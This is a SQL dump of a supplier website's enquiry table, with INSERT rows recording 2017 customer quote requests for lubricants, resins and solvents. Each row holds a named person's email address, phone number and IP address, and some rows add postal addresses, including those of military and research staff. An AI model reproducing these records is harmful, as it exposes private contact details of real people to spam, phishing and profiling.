INSERT INTO `wp_enquiry_detail_new` VALUES (854, 'Ricardo Uriarte', 'ricardouriarte@bryantrubber.com', 'Hello, \n\nI\'m interested in testing your lubricant. Please let me know the pricing.\n\nThank you.', '310561-4660', 'Quote for MS-122AD', '12.24.50.178', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-25 17:14:24', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (855, 'MIRIAM BERMAN', 'mberman@sc-jukar.com', 'quote  box of 12 lubricants MS-122AD PTFE Relese agent dry 1-', '011528999250247', '12', '189.153.197.8', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-25 17:22:27', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (856, 'Jamie Leger', 'Jamie.Leger@vsptechnologies.com', 'I am looking for the Krytox GPL 202 - 1lb JAR. Do you have stock available to ship today?', '337583-4220', 'RFQ', '108.230.206.31', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"783";s:5:"title";s:7:"GPL 202";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_333727961.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-25 18:50:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (857, 'yumiko arakawa', 'yumiko.arakawa@nagase-nam.com', 'Would you provide the quote for followings?\n-KRYTOX 143AB 0.45Kg/CAN X 2\n-BRAYCO MICRONIC 815AZ CASTROL 0.45Kg/CAN X1\n\nplease also advise those lead time.', '408235-1756', 'REQUEST FOR QUOTE', '63.158.218.235', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"581";s:5:"title";s:5:"143AB";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_395244856.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-25 19:17:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (858, 'Michael Carr', 'mjcarr@hybridplastics.com', 'Hello: Could you please let me know the lead time and price for 1 gallon and the next larger size (5 gal?).  Thank you.', '601544-3466', 'Price and Availability', '12.202.108.74', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-25 19:23:24', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (859, 'Daniel Roy', 'droy@aphysci.com', 'Hello, \n\nI\'m looking for price and lead time on the GPL222 in 8oz tube.  \n\nThank You,\nDaniel Roy', '401824-4566', 'Krytox GPL222', '66.153.69.205', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"846";s:5:"title";s:7:"GPL 222";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_313168337.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-25 20:09:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (860, 'Ken Chase', 'kenchase@fluidseals.com.au', 'Please advise price and avails 5 x 2oz tubes Chemours Krytox 240AB with manufacturer\'s certificate of analysis', '714556-4931', 'Krytox 240AB', '218.214.0.218', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"643";s:5:"title";s:5:"240AB";s:5:"price";s:0:"";s:5:"quant";s:1:"5";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_92852002.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-25 23:37:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (861, 'JUSTIN ROLANDO', 'jrolando@caltech.edu', 'Hello, I\'m looking to acquire 10-100 mL of the XHT-1000 oil for use in research. Could you please provide a quote?', '626395-3464', 'XHT-1000', '131.215.32.212', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"708";s:5:"title";s:8:"XHT-1000";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_373999234.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-26 01:30:43', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (862, 'thao nguyen', 'ngnpthao@gmail.com', 'could you please send me the price of the product name "EPON Resin 862"\nThank you very much,\nBest.', '+8210-5445-5861', 'product prices', '61.245.245.53', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-26 05:43:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (863, 'Gabriel Liske', 'G.Liske@schoelly.de', 'how much is the smalles amount of Krytox GPL 100 including shipping to germany?\n\nWith best regards', '', '', '85.220.144.106', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"421";s:5:"title";s:7:"GPL 100";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-26 07:18:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (864, 'Geza Medveczky', 'geza@gtechusa.com', 'Dear Sales,\nPlease send a quote for 6 can of MS-456C. \nAt what qty is the price break?\nThanks,\nGeza', '914734-7090', 'MS-465C', '96.246.163.19', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"733";s:5:"title";s:7:"MS-465C";s:5:"price";s:0:"";s:5:"quant";s:1:"6";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-465C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-26 14:51:40', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (865, 'Kenneth Belovarac', 'kbelovarac@psicorp.com', 'I\'m with Physical Science Inc. in Haverhill and would like to place a purchase order one gallon of Epon 862. If you could get back to me (call or email) with a quote, that would be great.', '618850-2859', 'Price Quote', '70.88.201.165', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-26 15:31:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (866, 'Robert', 'robert.maxwell@airgas.com', 'just looking for a price on 12oz can of vertrel mca. looking to get 1 or 2 case.', '', 'Vertrel MCA', '165.225.34.80', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1263";s:5:"title";s:11:"Vertrel MCA";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-solvent.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-26 16:47:04', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (867, 'Matthew Baird', 'matthew.j.baird@wmich.edu', '1 Quart - Quick question:  Is it known if this will affect cured Gypsum based plasters?  I would like to use this as a form of dissolving PLA for "lost PLA" type casting.  This may be a good alternative to just melting the PLA by activily dissolving the PLA from the plaster mold, potentially leaving the plaster mold untouched.', '269270-5198', 'MS-111 Stripping Agent', '35.46.9.82', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-26 17:32:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (868, 'JOHN MILLER', 'john.miller@patamsllc.com', 'We have bought this from you in the past. Our name was Ridge Manufacturing. Changed to Patriot American Solutions LLC. Same address. Also need C of C', '862209-4772', 'Buy', '47.22.40.10', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-26 20:16:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (869, 'Jonathan Sindler', 'jonathan.sindler@siemens-healthineers.com', 'Hi,\n\nWhat materials are your fluoropolymer coatings designed to coat?  Do you have anything that can bond to Kevlar?\n\nThanks,\nJon', '650892-4996', 'Fluoropolymer Coatings for Medical Application', '104.129.192.75', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"469";s:5:"title";s:30:"Fluoropolymer Medical Coatings";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:105:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Fluoropolymer-coating-Catheter-guidewire.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-26 23:02:32', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (870, 'Jason Miller', '609jasonmiller@gmail.com', 'Hello. I need maybe a half dozen 8oz cans. Just curious about price and how to order. Thanks!', '507317-2257', 'Price', '75.73.9.107', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1292";s:5:"title";s:23:"MS-530N Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/contact-cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-27 01:58:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (871, 'Marco Fanzutti', 'marco.fanzutti@igb.fraunhofer.de', 'Dear Sir or Madam,\n\nI would like to have further information about the product "VAZO 52", especially the price for the smallest possible size (I am not sure if I understand it correctly it is 100 g). The adress for possible shipping would be Nobelstraße 12, 70569 Stuttgart.\n\nBest regards,\nMarco Fanzutti', '', 'Futher Product Information', '129.233.2.155', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"568";s:5:"title";s:7:"VAZO 52";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-pca-oil.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-27 08:01:43', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (872, 'Farad khan ', 'farad@airpartsme.com', 'Urgent requirement of Molytetra Fluoro Ethylene (Miller MS122XD), Qty - 30 of pack size 14oz  Aerosol can.  \n', '+918606149035', 'Urgent ', '137.97.10.63', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1681";s:5:"title";s:8:"MS-122XD";s:5:"price";s:0:"";s:5:"quant";s:2:"30";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122xd-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-27 08:44:20', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (873, 'Brandon Martinelli', 'bmartinelli@altekcompany.com', 'please quote 2 5 gallon containers of the MS477C\n\nthank you\n\nBrandon Martinelli', '860482-7626', 'quote', '173.220.212.58', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"637";s:5:"title";s:7:"MS-477C";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-477C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-27 15:14:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (874, 'Eric Gladden', 'eric.gladden@solvay.com', 'Hi, I would like to place an order for a 2.5L bottle of Epon Resin 862. thanks! Eric', '864299-9309', 'epon resin 862', '150.251.3.1', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-27 18:37:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (875, 'Erica Malloch', 'emalloch@illinois.edu', 'Please quote Epikure 3274. ', '', '', '98.228.61.125', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1191";s:5:"title";s:15:"EPIKURE™ 3274";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-27 20:02:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (876, 'Kevin Moore', 'kevin.r.moore@raytheon.com', 'Would like a quote for  1 gal.  Would anticipate use buying 2 x 1 gal at a time.  If there is a min buy please quote min buy qty.\n\nThanks!', '413494-8007', 'Quote for MS-143XD', '199.46.251.142', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"306";s:5:"title";s:8:"MS-143XD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143XD.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-27 20:26:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (877, 'Stephen Smith', 'ssmith@appliedchemical.com', 'To whom it may concern:\nI am representing Applied Chemical Technology in Florence, Al.  We are looking for bisphenol A epoxy resin and are currently exploring our options.  Could you provide me with a quote for this material, and potentially a sample?\n\nThank you,\nStephen Smith\nApplied Chemical Technology', '', 'Price quote', '96.94.171.229', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"861";s:5:"title";s:11:"EPON™ 826";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-RESIN-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-28 14:47:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (878, 'Stephen Smith', 'ssmith@appliedchemical.com', 'To whom it may concern:\nI am representing Applied Chemical Technology in Florence, Al.  We are looking for a bisphenol A epoxy resin and are currently exploring our options.  I would greatly appreciate a price quote on this material.\n\nThank you,\nStephen Smith\nApplied Chemical Technology', '', 'Price Quote', '96.94.171.229', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-28 14:49:53', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (879, 'Diarny Fernandes', 'dfernandes@aerovox.com', 'Please send quote and lead time for this product:\n\n5 gallon container of EPON Resin 828\n\nNeed information to complete a requisition form and purchase.', '508998-3602', '5 Gallon EPON Resin 828', '50.204.27.74', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-28 18:15:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (880, 'Mike Beier', 'mbeier@asterisk.com', 'I would like a case price quote on this product.\n-Mike', '714743-7001', '', '76.237.157.213', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1726";s:5:"title";s:24:"Antistatic Quik-Freeze®";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze-anti-static.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-29 15:58:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (881, 'Shannon Kerr', 'shannonkerr@pipepigs.com', 'We are a 30 year old full time manufacturing firm that is searching for a non transferring mold release. \nThanks,\nShannon Kerr\nPipeline Pigging Products Inc. ', '281351-6688', 'Releasys 8500', '108.248.173.39', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"293";s:5:"title";s:13:"ReleaSys 8500";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:83:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Tire-releasys-8500.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-30 00:15:36', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (882, 'sreenivasa rao vengala', 'vsrao_rr@yahoo.com', 'please furnish us the quote for minimum order quantity to trail on FRP EPOXY base to get EMI shielding', '984806-7705', 'req., of conductive coating', '49.207.7.27', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1722";s:5:"title";s:55:"RFI / EMI Nickel Conductive Coating (MS-485G / MS-487G)";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/shutterstock_484572385.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-30 06:03:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (883, 'sreenivasa rao vengala', 'vsrao_rr@yahoo.com', 'please furnish us the quote for minimum order quantity for use in FRP moulding temperature use 400 degree centigrade', '', 'requirement of high temp release agent', '49.207.7.27', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"308";s:5:"title";s:6:"MS-153";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Boron-nitride.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-30 06:07:43', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (884, 'alex warnock', 'alex@cuttingedgetech.ca', 'Please quote shipping included, possibly from your Canadian distributor.', '', '', '50.115.177.162', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"852";s:5:"title";s:7:"GPL 227";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_316632911.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-01 11:43:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (885, 'Mark Harris', 'mark@eisainc.com', 'Qty 5  VERTREL MCA  1GAL\nPlease include shipping costs to Savannah River Site, Aiken, SC 29808\n\n', '803641-9733', 'Need quote', '108.22.140.18', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1834";s:5:"title";s:7:"MS-752U";s:5:"price";s:0:"";s:5:"quant";s:1:"5";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-752U.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-01 11:50:11', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (886, ' Jim Hartman', 'JHartman@metokote.com', 'Need pricing and availability for 4 cartridges of GPL-227 Krytox grease. 0.8kg. \nMetokote Corp\n5750 State Rt 251\nPeru, IL 61354\nThank You', '815223-1190', 'Krytox GPL-227', '66.209.142.242', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"852";s:5:"title";s:7:"GPL 227";s:5:"price";s:0:"";s:5:"quant";s:1:"4";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_316632911.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-01 14:18:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (887, 'Lawrence Hetzel', 'lawrence.p.hetzel@lmco.com', 'I have a need for a small amount of Epon 826 resin...on the order of 1-4 liters. Please let me know what the minimum buy quantity is as well as associated prices and lead times.\nThanks,\nLarry', '410682-0841', 'Quote Request', '192.35.35.36', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"861";s:5:"title";s:11:"EPON™ 826";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-RESIN-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-01 15:10:04', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (888, 'Grant Prater', 'grant.prater@austinpowder.com', 'My company is in need for &gt;5 gallons of Krytox GPL-104. Could you please send me pricing information for two (2) 20 kg jugs of the product?\n\nThanks,\nGrant', '740596-5286', 'Inquiry for Krytox GPL-104', '209.221.11.48', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"439";s:5:"title";s:7:"GPL 104";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease4.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-01 16:02:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (889, 'Alexander Sushkov', 'asu@bu.edu', 'Hi,\nI\'d like to request a quote for one quart of MS-111 stripping agent.\nThanks,\nAlex Sushkov', '', '', '128.197.40.135', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-01 16:51:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (890, 'Patrick Tremblay', 'Patrick.tremblay5@forces.gc.ca', 'Hi, I would like to request a quote for a tube of 8 oz  MIL PRF-27617.\n\nThank you', '709256-1703', 'Quote', '131.137.245.209', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-01 17:48:51', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (891, 'Neelam', 'neelam@cnpl.in', 'Please quote for MCA &amp; MCA Plus 100 Kgs each', '+917710096163', 'Need an Offer', '171.50.214.219', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1263";s:5:"title";s:11:"Vertrel MCA";s:5:"price";s:0:"";s:5:"quant";s:3:"100";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-solvent.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-02 06:31:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (892, 'Mike Giacchetta', 'michael.giacchetta.ctr@navy.mil', 'Could I please get a quote for 2 cases of MS-580N\n\nPlease include shipping cost to; \n\nMilitary Sealift Command-SMS DET \nNaval Weapons Station, Yorktown \nCheatham Annex, 220 F Street, CAD 30, DWY 15 \nWilliamsburg, VA 23185 \n\nThe quote needs to be on your letter head please, I work for MSC (Military Sealift Command) in Williamsburg Va. and they will not accept the quote without it being on your company letter head, POC information and no sales tax included please. \n\nThank you\nMike\n', '757847-8106', 'Quote required ', '98.190.58.217', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1705";s:5:"title";s:12:"MS-580N/582N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-580N.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-02 10:50:12', '', NULL, '', '', '', NULL, '', ''); 
